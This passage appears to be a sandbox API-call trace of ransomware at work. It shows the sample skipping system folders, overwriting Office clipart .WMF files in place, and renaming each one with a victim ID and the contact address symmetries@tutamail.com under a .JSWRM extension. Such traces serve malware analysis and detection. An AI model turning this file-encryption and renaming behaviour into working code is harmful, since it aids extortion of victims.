ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xab2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0241043.WMF", cAlternateFileName="")) returned 1 [0088.582] lstrcmpiW (lpString1="J0241043.WMF", lpString2=".") returned 1 [0088.582] lstrcmpiW (lpString1="J0241043.WMF", lpString2="..") returned 1 [0088.582] lstrcmpiW (lpString1="J0241043.WMF", lpString2="...") returned 1 [0088.582] lstrcmpiW (lpString1="J0241043.WMF", lpString2="windows") returned -1 [0088.582] lstrcmpiW (lpString1="J0241043.WMF", lpString2="recovery") returned -1 [0088.582] lstrcmpiW (lpString1="J0241043.WMF", lpString2="perflogs") returned -1 [0088.582] lstrcmpiW (lpString1="J0241043.WMF", lpString2="documents and settings") returned 1 [0088.582] lstrcmpiW (lpString1="J0241043.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.582] lstrcmpiW (lpString1="J0241043.WMF", lpString2="system volume information") returned -1 [0088.583] lstrcmpiW (lpString1="J0241043.WMF", lpString2="msocache") returned -1 [0088.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0088.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241043.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241043.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241043.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0088.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0088.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241043.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241043.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241043.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0088.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241043.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241043.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.583] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2738) returned 1 [0088.583] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xab0) returned 0x23fc98 [0088.583] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xab0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xab0, lpOverlapped=0x0) returned 1 [0088.591] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.591] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xab0, lpOverlapped=0x0) returned 1 [0088.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0088.591] CloseHandle (hObject=0x314) returned 1 [0088.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0088.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0088.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0088.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0088.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0088.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.592] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241043.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241043.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241043.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241043.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0088.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.593] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf34834b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf34834b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x82a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0241077.WMF", cAlternateFileName="")) returned 1 [0088.593] lstrcmpiW (lpString1="J0241077.WMF", lpString2=".") returned 1 [0088.593] lstrcmpiW (lpString1="J0241077.WMF", lpString2="..") returned 1 [0088.593] lstrcmpiW (lpString1="J0241077.WMF", lpString2="...") returned 1 [0088.593] lstrcmpiW (lpString1="J0241077.WMF", lpString2="windows") returned -1 [0088.593] lstrcmpiW (lpString1="J0241077.WMF", lpString2="recovery") returned -1 [0088.593] lstrcmpiW (lpString1="J0241077.WMF", lpString2="perflogs") returned -1 [0088.593] lstrcmpiW (lpString1="J0241077.WMF", lpString2="documents and settings") returned 1 [0088.593] lstrcmpiW (lpString1="J0241077.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.593] lstrcmpiW (lpString1="J0241077.WMF", lpString2="system volume information") returned -1 [0088.593] lstrcmpiW (lpString1="J0241077.WMF", lpString2="msocache") returned -1 [0088.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241077.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241077.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241077.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0088.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241077.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241077.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241077.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0088.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0088.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241077.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241077.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.594] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2090) returned 1 [0088.594] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x820) returned 0x20c6c0 [0088.594] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x820, lpOverlapped=0x0) returned 1 [0088.596] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.596] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x820, lpOverlapped=0x0) returned 1 [0088.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0088.596] CloseHandle (hObject=0x314) returned 1 [0088.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0088.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0088.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0088.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0088.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0088.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0088.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.596] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241077.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241077.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241077.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241077.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0088.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0088.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0088.597] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf34834b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf34834b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcbe, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0241773.WMF", cAlternateFileName="")) returned 1 [0088.597] lstrcmpiW (lpString1="J0241773.WMF", lpString2=".") returned 1 [0088.597] lstrcmpiW (lpString1="J0241773.WMF", lpString2="..") returned 1 [0088.597] lstrcmpiW (lpString1="J0241773.WMF", lpString2="...") returned 1 [0088.597] lstrcmpiW (lpString1="J0241773.WMF", lpString2="windows") returned -1 [0088.597] lstrcmpiW (lpString1="J0241773.WMF", lpString2="recovery") returned -1 [0088.597] lstrcmpiW (lpString1="J0241773.WMF", lpString2="perflogs") returned -1 [0088.597] lstrcmpiW (lpString1="J0241773.WMF", lpString2="documents and settings") returned 1 [0088.597] lstrcmpiW (lpString1="J0241773.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.597] lstrcmpiW (lpString1="J0241773.WMF", lpString2="system volume information") returned -1 [0088.597] lstrcmpiW (lpString1="J0241773.WMF", lpString2="msocache") returned -1 [0088.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241773.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241773.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241773.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0088.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241773.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241773.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241773.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0088.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0088.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241773.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241773.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.598] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3262) returned 1 [0088.598] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcb0) returned 0x23fc98 [0088.598] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xcb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xcb0, lpOverlapped=0x0) returned 1 [0088.600] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.600] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xcb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xcb0, lpOverlapped=0x0) returned 1 [0088.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0088.600] CloseHandle (hObject=0x314) returned 1 [0088.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0088.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0088.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0088.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0088.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0088.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0088.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.600] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241773.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241773.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241773.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241773.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0088.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0088.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.601] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf34834b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf34834b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7b2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0241781.WMF", cAlternateFileName="")) returned 1 [0088.601] lstrcmpiW (lpString1="J0241781.WMF", lpString2=".") returned 1 [0088.601] lstrcmpiW (lpString1="J0241781.WMF", lpString2="..") returned 1 [0088.601] lstrcmpiW (lpString1="J0241781.WMF", lpString2="...") returned 1 [0088.601] lstrcmpiW (lpString1="J0241781.WMF", lpString2="windows") returned -1 [0088.601] lstrcmpiW (lpString1="J0241781.WMF", lpString2="recovery") returned -1 [0088.601] lstrcmpiW (lpString1="J0241781.WMF", lpString2="perflogs") returned -1 [0088.601] lstrcmpiW (lpString1="J0241781.WMF", lpString2="documents and settings") returned 1 [0088.601] lstrcmpiW (lpString1="J0241781.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.602] lstrcmpiW (lpString1="J0241781.WMF", lpString2="system volume information") returned -1 [0088.602] lstrcmpiW (lpString1="J0241781.WMF", lpString2="msocache") returned -1 [0088.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241781.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241781.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241781.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241781.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241781.WMF", cchWideChar=12, 